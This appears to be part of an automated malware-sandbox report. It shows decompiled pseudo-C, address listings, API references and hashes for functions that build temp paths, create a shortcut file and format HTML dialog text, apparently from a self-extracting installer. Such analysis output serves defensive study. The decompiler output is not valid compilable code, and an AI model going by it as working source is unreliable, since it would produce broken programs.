										__ebx = __edi;
										__esi = __ebp - 0x6c84;
										__eflags =  *(__ebp - 0x6c84) - __bx;
										if( *(__ebp - 0x6c84) == __bx) {
											goto L149;
										}
										L134:
										_push(0x20);
										_pop(__ecx);
										do {
											L135:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L137:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6c84 = E00199E6B(__ebp - 0x6c84);
												__eflags = __al;
												if(__al == 0) {
													L144:
													__esi->i = __di;
													L145:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L146;
												}
												L138:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L140:
													_push(0x20);
													_pop(__eax);
													do {
														L141:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x1c3c;
													L143:
													_push(__eax);
													__eax = E001B4D7E();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L145;
												}
												L139:
												 *(__ebp - 0x1c3c) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x1c3a;
												goto L143;
											}
											L136:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L146;
											}
											goto L137;
											L146:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L149;
									} else {
										L130:
										__ebp - 0x19c8a = __ebp - 0x6c84;
										E001B4D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
										_push(__ebx);
										_push(__ebp - 0x6c82);
										__eax = E001B0BB8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1c3c = E001B4D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
											_pop(__ecx);
											_pop(__ecx);
										}
										L149:
										__eflags =  *(__ebp - 0x11c8c);
										__ebx = 0x800;
										if( *(__ebp - 0x11c8c) != 0) {
											_push(0x800);
											__eax = __ebp - 0x9c8c;
											_push(__ebp - 0x9c8c);
											__eax = __ebp - 0x11c8c;
											_push(__ebp - 0x11c8c);
											__eax = E0019AED7();
										}
										_push(__ebx);
										__eax = __ebp - 0xbc8c;
										_push(__ebp - 0xbc8c);
										__eax = __ebp - 0x6c84;
										_push(__ebp - 0x6c84);
										__eax = E0019AED7();
										__eflags =  *(__ebp - 0x2c3c);
										if(__eflags == 0) {
											__ebp - 0x2c3c = E001AA24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
										}
										__ebp - 0x2c3c = E0019AEA5(__eflags, __ebp - 0x2c3c, __ebx);
										__eflags =  *((short*)(__ebp - 0x17c8c));
										if(__eflags != 0) {
											__ebp - 0x17c8c = __ebp - 0x2c3c;
											E0019FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
											__eax = E0019AEA5(__eflags, __ebp - 0x2c3c, __ebx);
										}
										__ebp - 0x2c3c = __ebp - 0xcc8c;
										__eax = E001B4D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
										__eflags =  *(__ebp - 0x13c8c);
										__eax = __ebp - 0x13c8c;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19c8c;
										}
										__ebp - 0x2c3c = E0019FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
										__eax = __ebp - 0x2c3c;
										__eflags = E0019B153(__ebp - 0x2c3c);
										if(__eflags == 0) {
											L159:
											__ebp - 0x2c3c = E0019FA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
											goto L160;
										} else {
											L158:
											__eflags = __eax;
											if(__eflags == 0) {
												L160:
												_push(1);
												__eax = __ebp - 0x2c3c;
												_push(__ebp - 0x2c3c);
												E00199D3A(__ecx, __ebp) = __ebp - 0xbc8c;
												__ebp - 0xac8c = E001B4D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xac8c = E0019B98D(__eflags, __ebp - 0xac8c);
												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
												__eax = __ebp - 0x1c3c;
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
												__edx = __ebp - 0x9c8c;
												__esi = __ebp - 0xac8c;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
												__eax = __ebp - 0x15c8c;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
												E001A9D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
												__ebp - 0xbc8c = E001A9450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
												__eflags =  *(__ebp - 0xcc8c);
												if( *(__ebp - 0xcc8c) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcc8c;
													_push(__ebp - 0xcc8c);
													_push(5);
													_push(0x1000);
													__eax =  *0x1cdef8();
												}
												goto L164;
											}
											goto L159;
										}
									}
								case 0xb:
									L162:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0x1d9600 = 1;
									}
									goto L164;
								case 0xc:
									L83:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eax = E001B59C0( *(__ebp - 0x5c84) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0x1d75d4 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0x1d75d5 = 1;
										} else {
											__eax = 0;
											 *0x1d75d4 = __al;
											 *0x1d75d5 = __al;
										}
									}
									goto L164;
								case 0xd:
									L93:
									 *0x1ede21 = 1;
									__eax = __eax + 0x1ede21;
									_t104 = __esi + 0x39;
									 *_t104 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t104;
									__ebp = 0xffffa37c;
									if( *_t104 != 0) {
										_t106 = __ebp - 0x5c84; // 0xffff46f8
										__eax = _t106;
										_push(_t106);
										 *0x1cd5fc = E001A13FC();
									}
									goto L164;
							}
							L2:
							_t210 = E001A9E24(_t210, _t279);
							_t279 = _t279 + 0x2000;
							_t277 = _t277 - 1;
							if(_t277 != 0) {
								goto L2;
							} else {
								_t280 = _t277;
								goto L4;
							}
						}
						L165:
						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
						return _t209;
					}
					L100:
					__eflags =  *0x1e5d02;
					if( *0x1e5d02 != 0) {
						goto L164;
					}
					L101:
					__eax = 0;
					 *(__ebp - 0x143c) = __ax;
					__eax = __ebp - 0x5c84;
					_push(__ebp - 0x5c84);
					__eax = E001B0BB8(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L108:
						__eflags =  *(__ebp - 0x143c);
						if( *(__ebp - 0x143c) == 0) {
							__ebp - 0x1bc8c = __ebp - 0x5c84;
							E0019FAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
							__ebp - 0x143c = E0019FAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
						}
						__ebp - 0x5c84 = E001A9C4F(__ebp - 0x5c84);
						__eax = 0;
						 *(__ebp - 0x4c84) = __ax;
						__ebp - 0x143c = __ebp - 0x5c84;
						__eax = E001A9735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L164;
						} else {
							L111:
							__eax = 0;
							__eflags = 0;
							 *0x1d75d7 = 1;
							 *0x1d85fa = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L112;
						}
					}
					L102:
					__esi = 0;
					__eflags =  *(__ebp - 0x5c84) - __dx;
					if( *(__ebp - 0x5c84) == __dx) {
						goto L108;
					}
					L103:
					__ecx = 0;
					__eax = __ebp - 0x5c84;
					while(1) {
						L104:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L105:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x5c84;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x5c84 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L106:
						goto L108;
					}
					L107:
					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
					__ebp - 0x143c = E0019FAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
					goto L108;
					L112:
					__eflags = _t263 - 7;
					if(_t263 == 7) {
						__eflags =  *0x1d95fc;
						if( *0x1d95fc == 0) {
							 *0x1d95fc = 2;
						}
						 *0x1d85f8 = 1;
					}
					goto L164;
				}
			}

0x001abb5b
0x001abb5b
0x001abb5b
0x001abb5b
0x001abb5e
0x00000000
0x00000000
0x001abb64
0x001abb64
0x001abb6a
0x001abb78
0x001abb84
0x001abb86
0x001abb88
0x001abb8d
0x001abb8d
0x001abb8d
0x001abba5
0x001abbb2
0x001abbb7
0x001abbb9
0x00000000
0x00000000
0x001abb8b
0x001abb8b
0x001abb8b
0x001abb8c
0x001abb8c
0x001abbbb
0x001abbc5
0x001abbcb
0x001abbd3
0x001ac093
0x001ac093
0x001ac093
0x001ac098
0x001ac09c
0x001ac0a0
0x001ac0a7
0x001ac0ae
0x001ac0b1
0x001ac0b6
0x001ac0b9
0x001ac0be
0x001ab51d
0x001ab523
0x001ab529
0x001ab529
0x00000000
0x00000000
0x00000000
0x00000000
0x001ab53e
0x001ab555
0x001ab559
0x00000000
0x001ab55b
0x00000000
0x001ab55b
0x001ab559
0x001ab560
0x001ab563
0x00000000
0x00000000
0x001ab569
0x001ab569
0x00000000
0x001ab570
0x001ab570
0x001ab573
0x00000000
0x00000000
0x001ab579
0x001ab579
0x001ab586
0x001ab5ac
0x001ab5b7
0x001ab5c1
0x001ab5cc
0x001ab5d1
0x001ab5d9
0x001ab5df
0x001ab5e4
0x001ab5e6
0x001ab74b
0x001ab74b
0x001ab755
0x00000000
0x001ab5ec
0x001ab5f2
0x001ab614
0x001ab623
0x001ab630
0x001ab641
0x001ab644
0x001ab647
0x001ab65a
0x001ab661
0x001ab666
0x001ab668
0x00000000
0x00000000
0x001ab66e
0x001ab675
0x001ab67a
0x001ab67f
0x001ab68b
0x001ab690
0x001ab693
0x001ab69a
0x001ab69c
0x001ab69d
0x001ab6a7
0x001ab6ad
0x001ab6ae
0x00000000
0x001ab6ae
0x001ab649
0x001ab650
0x001ab656
0x001ab658
0x00000000
0x00000000
0x00000000
0x001ab6b4
0x001ab6bb
0x001ab6bd
0x001ab6c0
0x001ab730
0x001ab730
0x001ab738
0x001ab73e
0x001ab743
0x001ab745
0x001ab5f4
0x001ab5f9
0x001ab601
0x001ab607
0x001ab60e
0x00000000
0x00000000
0x00000000
0x001ab60e
0x00000000
0x001ab745
0x001ab6c2
0x001ab6c9
0x001ab6cf
0x001ab6d1
0x00000000
0x001ab6d3
0x001ab6d3
0x001ab6d5
0x001ab6d6
0x001ab6da
0x001ab6f2
0x001ab6f7
0x001ab701
0x001ab703
0x001ab706
0x001ab6d8
0x001ab6d8
0x001ab6d9
0x00000000
0x001ab708
0x001ab716
0x001ab71c
0x001ab71e
0x001ab72a
0x001ab72a
0x00000000
0x001ab71e
0x001ab706
0x001ab6d1
0x00000000
0x001ab75f
0x001ab75f
0x001ab761
0x001ab767
0x001ab76c
0x001ab76e
0x001ab771
0x001ab773
0x001ab780
0x001ab785
0x001ab786
0x001ab786
0x001ab787
0x001ab787
0x001ab78a
0x001ab78c
0x001ab796
0x001ab799
0x001ab79f
0x001ab7a1
0x001ab78e
0x001ab78e
0x001ab78e
0x001ab7a6
0x001ab7a8
0x001ab7b1
0x001ab7b1
0x001ab7b3
0x001ab7b4
0x001ab7b9
0x001ab7c2
0x001ab7c3
0x001ab7c9
0x001ab7ce
0x001ab7d1
0x001ab7d3
0x001ab7d5
0x001ab7da
0x001ab7dc
0x001ab7de
0x001ab7de
0x001ab7e0
0x001ab7e0
0x001ab7e5
0x001ab7ea
0x001ab7eb
0x001ab7eb
0x001ab7ec
0x001ab7ee
0x001ab7f5
0x001ab7fa
0x001ab7ee
0x00000000
0x00000000
0x001ab800
0x001ab800
0x001ab802
0x001ab812
0x001ab812
0x00000000
0x00000000
0x001ab81d
0x001ab81d
0x001ab81f
0x00000000
0x00000000
0x001ab825
0x001ab825
0x001ab82c
0x00000000
0x00000000
0x001ab832
0x001ab832
0x001ab834
0x001ab83a
0x001ab83c
0x001ab843
0x001ab844
0x001ab84b
0x001ab84d
0x001ab84d
0x001ab854
0x001ab859
0x001ab85f
0x001ab861
0x00000000
0x001ab867
0x001ab867
0x001ab867
0x001ab86a
0x001ab86c
0x001ab86d
0x001ab870
0x001ab899
0x001ab899
0x001ab89c
0x001ab981
0x001ab98a
0x001ab98f
0x001ab98f
0x001ab991
0x001ab991
0x001ab993
0x001ab995
0x001ab99c
0x001ab9a1
0x001ab9a2
0x001ab9a3
0x001ab9a5
0x001ab9a7
0x001ab9ab
0x001ab9ad
0x001ab9ad
0x001ab9af
0x001ab9af
0x001ab9ab
0x001ab9b3
0x001ab9b9
0x001ab9c6
0x001ab9cd
0x001ab9dd
0x001ab9e7
0x001ab9ef
0x001ab9fb
0x001ab9fd
0x001aba05
0x001aba0a
0x001aba0b
0x001aba0c
0x001aba0e
0x001aba1b
0x001aba24
0x001aba24
0x00000000
0x001aba0e
0x001ab8a2
0x001ab8a2
0x001ab8a5
0x001ab8b2
0x001ab8b2
0x001ab8b5
0x001ab8b7
0x001ab8b8
0x001ab8ba
0x001ab8bb
0x001ab8c0
0x001ab8c5
0x001ab8cb
0x001ab8cd
0x001ab8cf
0x001ab8d2
0x001ab8d9
0x001ab8da
0x001ab8e0
0x001ab8e1
0x001ab8e4
0x001ab8e5
0x001ab8e6
0x001ab8eb
0x001ab8ee
0x001ab8f4
0x001ab8fd
0x001ab900
0x001ab905
0x001ab907
0x001ab909
0x001ab90b
0x001ab90b
0x001ab90d
0x001ab90d
0x001ab90f
0x001ab90f
0x001ab917
0x001ab91e
0x001ab920
0x001ab927
0x001ab92d
0x001ab92f
0x001ab930
0x001ab938
0x001ab947
0x001ab947
0x001ab938
0x001ab952
0x001ab954
0x001ab963
0x001ab969
0x001ab96f
0x001ab97a
0x001ab97a
0x00000000
0x001ab96f
0x001ab8a7
0x001ab8a7
0x001ab8ac
0x00000000
0x00000000
0x00000000
0x001ab8ac
0x001ab872
0x001ab872
0x001ab876
0x00000000
0x00000000
0x001ab878
0x001ab878
0x001ab87b
0x001ab87d
0x001ab880
0x00000000
0x00000000
0x001ab886
0x001ab88f
0x00000000
0x001ab88f
0x00000000
0x001aba2b
0x001aba2b
0x001aba2c
0x001aba31
0x001aba33
0x001aba36
0x001aba36
0x00000000
0x001aba6c
0x001aba6c
0x001aba73
0x001aba75
0x001aba75
0x001aba77
0x001abaa6
0x001abaa6
0x001abaac
0x00000000
0x001abaac
0x001aba79
0x001aba79
0x001aba79
0x001aba7c
0x001aba95
0x001aba95
0x001aba9b
0x001aba9b
0x00000000
0x001aba9b
0x001aba7e
0x001aba7e
0x001aba7e
0x001aba81
0x00000000
0x00000000
0x001aba83
0x001aba83
0x001aba83
0x001aba86
0x00000000
0x00000000
0x001aba8c
0x001aba8c
0x00000000
0x00000000
0x001abaf9
0x001abaf9
0x001abafc
0x00000000
0x00000000
0x001abafe
0x001abafe
0x001abb0a
0x001abb0f
0x001abb10
0x001abb11
0x001abb13
0x00000000
0x00000000
0x001abb15
0x001abb15
0x00000000
0x00000000
0x00000000
0x00000000
0x001abd07
0x001abd07
0x001abd0a
0x001abd0c
0x001abd13
0x001abd15
0x001abd1b
0x001abd1c
0x001abd21
0x001abd22
0x001abd22
0x001abd27
0x001abd2a
0x001abd30
0x001abd30
0x001abd35
0x00000000
0x00000000
0x001abd41
0x001abd41
0x001abd44
0x001abb25
0x001abb25
0x00000000
0x001abb25
0x001abd4a
0x001abd4a
0x001abb16
0x001abb16
0x001abb1c
0x001abb1d
0x001abb20
0x00000000
0x00000000
0x001abd51
0x001abd51
0x001abd54
0x00000000
0x00000000
0x001abd5a
0x001abd5a
0x001abd5c
0x001abd63
0x001abd6b
0x001abd71
0x001abd76
0x001abd79
0x001abdae
0x001abdb3
0x001abdb9
0x001abdba
0x001abdbf
0x001abd7b
0x001abd7b
0x001abd7e
0x001abd84
0x001abd9a
0x001abd9f
0x001abda0
0x001abda5
0x001abd86
0x001abd86
0x001abd8b
0x001abd8c
0x001abd91
0x001abd91
0x001abd84
0x001abdc6
0x001abdc8
0x001abdcf
0x001abddd
0x001abde4
0x001abde9
0x001abdea
0x001abdeb
0x001abded
0x001abdee
0x001abdf5
0x001abe3e
0x001abe45
0x001abe4a
0x001abe4c
0x00000000
0x00000000
0x001abe52
0x001abe52
0x001abe54
0x001abe5a
0x001abe61
0x00000000
0x00000000
0x001abe63
0x001abe63
0x001abe65
0x001abe66
0x001abe66
0x001abe66
0x001abe69
0x001abe6c
0x001abe76
0x001abe76
0x001abe78
0x001abe7a
0x001abe84
0x001abe89
0x001abe8b
0x001abec9
0x001abec9
0x001abecc
0x001abecc
0x001abece
0x001abecf
0x001abecf
0x00000000
0x001abecf
0x001abe8d
0x001abe8d
0x001abe8f
0x001abe90
0x001abe92
0x001abe95
0x001abeaa
0x001abeaa
0x001abeac
0x001abead
0x001abead
0x001abead
0x001abeb0
0x001abeb0
0x001abeb5
0x001abeb6
0x001abebc
0x001abebc
0x001abebd
0x001abec2
0x001abec3
0x001abec4
0x00000000
0x001abec4
0x001abe97
0x001abe97
0x001abe9e
0x001abea1
0x001abea2
0x00000000
0x001abea2
0x001abe6e
0x001abe6e
0x001abe70
0x001abe71
0x001abe74
0x00000000
0x00000000
0x00000000
0x001abed1
0x001abed1
0x001abed4
0x001abed4
0x001abed9
0x001abedb
0x001abedd
0x001abedd
0x001abedf
0x001abedf
0x00000000
0x001abdf7
0x001abdf7
0x001abdfe
0x001abe0a
0x001abe10
0x001abe11
0x001abe12
0x001abe17
0x001abe1a
0x001abe1c
0x001abe22
0x001abe24
0x001abe32
0x001abe37
0x001abe38
0x001abe38
0x001abee2
0x001abee2
0x001abeea
0x001abeef
0x001abef1
0x001abef2
0x001abef8
0x001abef9
0x001abeff
0x001abf00
0x001abf00
0x001abf05
0x001abf06
0x001abf0c
0x001abf0d
0x001abf13
0x001abf14
0x001abf19
0x001abf21
0x001abf2d
0x001abf2d
0x001abf3a
0x001abf3f
0x001abf47
0x001abf51
0x001abf5e
0x001abf65
0x001abf65
0x001abf71
0x001abf78
0x001abf7d
0x001abf85
0x001abf8b
0x001abf8c
0x001abf8d
0x001abf8f
0x001abf8f
0x001abfa4
0x001abfa9
0x001abfb5
0x001abfb7
0x001abfc8
0x001abfd5
0x00000000
0x001abfb9
0x001abfb9
0x001abfc4
0x001abfc6
0x001abfda
0x001abfda
0x001abfdc
0x001abfe2
0x001abfe8
0x001abff6
0x001abffb
0x001abffc
0x001ac004
0x001ac009
0x001ac010
0x001ac016
0x001ac018
0x001ac01e
0x001ac024
0x001ac026
0x001ac02f
0x001ac032
0x001ac034
0x001ac03d
0x001ac040
0x001ac046
0x001ac049
0x001ac052
0x001ac061
0x001ac066
0x001ac06e
0x001ac070
0x001ac071
0x001ac077
0x001ac078
0x001ac07a
0x001ac07f
0x001ac07f
0x00000000
0x001ac06e
0x00000000
0x001abfc6
0x001abfb7
0x00000000
0x001ac087
0x001ac087
0x001ac08a
0x001ac08c
0x001ac08c
0x00000000
0x00000000
0x001abab8
0x001abab8
0x001abac0
0x001abac6
0x001abac9
0x001abaed
0x001abacb
0x001abacb
0x001abace
0x001abae1
0x001abad0
0x001abad0
0x001abad2
0x001abad7
0x001abad7
0x001abace
0x00000000
0x00000000
0x001abb31
0x001abb31
0x001abb32
0x001abb37
0x001abb37
0x001abb37
0x001abb3a
0x001abb3f
0x001abb45
0x001abb45
0x001abb4b
0x001abb51
0x001abb51
0x00000000
0x00000000
0x001ab52a
0x001ab52c
0x001ab531
0x001ab537
0x001ab53a
0x00000000
0x001ab53c
0x001ab53c
0x00000000
0x001ab53c
0x001ab53a
0x001ac0c4
0x001ac0ca
0x001ac0d4
0x001ac0d4
0x001abbd9
0x001abbd9
0x001abbe0
0x00000000
0x00000000
0x001abbe6
0x001abbe6
0x001abbe8
0x001abbef
0x001abbf7
0x001abbf8
0x001abbfd
0x001abbfe
0x001abbff
0x001abc01
0x001abc55
0x001abc55
0x001abc5d
0x001abc6b
0x001abc7c
0x001abc8a
0x001abc8a
0x001abc96
0x001abc9b
0x001abc9d
0x001abcad
0x001abcb7
0x001abcbc
0x001abcbf
0x00000000
0x001abcc5
0x001abcc5
0x001abcca
0x001abcca
0x001abccc
0x001abcd3
0x001abcd9
0x00000000
0x001abcd9
0x001abcbf
0x001abc03
0x001abc05
0x001abc07
0x001abc0e
0x00000000
0x00000000
0x001abc10
0x001abc10
0x001abc12
0x001abc18
0x001abc18
0x001abc18
0x001abc1c
0x00000000
0x00000000
0x001abc1e
0x001abc1e
0x001abc1f
0x001abc25
0x001abc28
0x001abc2a
0x001abc2d
0x00000000
0x00000000
0x001abc2f
0x00000000
0x001abc2f
0x001abc31
0x001abc3c
0x001abc46
0x001abc4b
0x001abc4b
0x001abc4d
0x00000000
0x001abcdf
0x001abcdf
0x001abce2
0x001abce8
0x001abcef
0x001abcf1
0x001abcf1
0x001abcfb
0x001abcfb
0x00000000
0x001abce2

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 001ABB71
_swprintf.LIBCMT ref: 001ABBA5

Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54

SetDlgItemTextW.USER32(?,00000066,001D85FA), ref: 001ABBC5
_wcschr.LIBVCRUNTIME ref: 001ABBF8
EndDialog.USER32(?,00000001), ref: 001ABCD9

Strings

%s%s%u, xrefs: 001ABB9A

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 91f9c86bb7d10c154d64d92ff111d1ca89b0665d38d4c3157af7f72c85bed845
Instruction ID: 99c5f4c3857be3a74e707d77903b321ba218c6657e44b9de7d439685da27fd5d
Opcode Fuzzy Hash: 91f9c86bb7d10c154d64d92ff111d1ca89b0665d38d4c3157af7f72c85bed845
Instruction Fuzzy Hash: DB41BB7A900259AEEF25DBA4DC85FEE77B8EB15314F0040A6F409E6151EF718B848FA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A88BF, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001A88BF(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t67;
				long _t69;
				void* _t71;
				void* _t72;

				_t58 = __edx;
				_t43 = _t44;
				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t71 + 0x18));
				 *((char*)(_t71 + 0x1c)) = E001A87A5(_t60);
				_push(0x200 + E001B2B33(_t60) * 2);
				_t24 = E001B2B53(_t44);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E001B4D7E(_t64, L"<html>");
				E001B66ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E001B66ED(_t64, L"utf-8\"></head>");
				_t72 = _t71 + 0x18;
				_t67 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E001A1432(_t76, _t67, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
					if(_t31 != 0) {
						_t60 = _t67 + 0xc;
					}
					E001B66ED(_t64, _t60);
					if( *((char*)(_t72 + 0x1c)) == 0) {
						E001B66ED(_t64, L"</html>");
					}
					_t79 =  *((char*)(_t72 + 0x1c));
					if( *((char*)(_t72 + 0x1c)) == 0) {
						_push(_t64);
						_t64 = E001A8ACA(_t58, _t79);
					}
					_t69 = 9 + E001B2B33(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t69);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L001B2B4E(_t64);
					_t24 =  *0x1cdff8(_t62, 1, _t72 + 0x10);
					if(_t24 >= 0) {
						E001A87DC( *((intOrPtr*)(_t43 + 0x10)));
						_t38 =  *((intOrPtr*)(_t72 + 0xc));
						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t67 = _t67 + 2;
					_t76 =  *_t67 - _t28;
				} while ( *_t67 == _t28);
				goto L4;
			}

0x001a88bf
0x001a88c2
0x001a88c8
0x001a8a04
0x001a8a04
0x001a88ce
0x001a88d5
0x001a88e0
0x001a88f0
0x001a88f1
0x001a88f6
0x001a88fc
0x001a89ff
0x00000000
0x001a8a00
0x001a8909
0x001a8914
0x001a891f
0x001a8924
0x001a8927
0x001a892b
0x001a892f
0x001a893a
0x001a8942
0x001a8949
0x001a894b
0x001a894d
0x001a8951
0x001a8953
0x001a8953
0x001a8958
0x001a8964
0x001a896c
0x001a8972
0x001a8973
0x001a8978
0x001a897a
0x001a8982
0x001a8982
0x001a898e
0x001a899a
0x001a899e
0x001a89a8
0x001a89bd
0x001a89ca
0x001a89bf
0x001a89bf
0x001a89c4
0x001a89c4
0x001a89bd
0x001a89ce
0x001a89dc
0x001a89e5
0x001a89f0
0x001a89f5
0x001a89fc
0x001a89fc
0x00000000
0x00000000
0x00000000
0x00000000
0x001a8931
0x001a8931
0x001a8931
0x001a8934
0x001a8934
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A87A0), ref: 001A8994
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 001A89B5

Strings

<html>, xrefs: 001A8903, 001A893C
</html>, xrefs: 001A8966
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 001A890E
utf-8"></head>, xrefs: 001A8919

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: e9a2e42988651268bfe43e90e1d4b77decdc63f70fa2af36dd697fbec1cbf325
Instruction ID: 3bb04c541213b9a7a405ba8115a26173f42f0023ccfa0ec84826992e883efe22
Opcode Fuzzy Hash: e9a2e42988651268bfe43e90e1d4b77decdc63f70fa2af36dd697fbec1cbf325
Instruction Fuzzy Hash: E23112761053027EE714ABA09C46FBBBB98DFA2324F14851EF424961C2EF74D90987A6

Uniqueness

Uniqueness Score: -1.00%

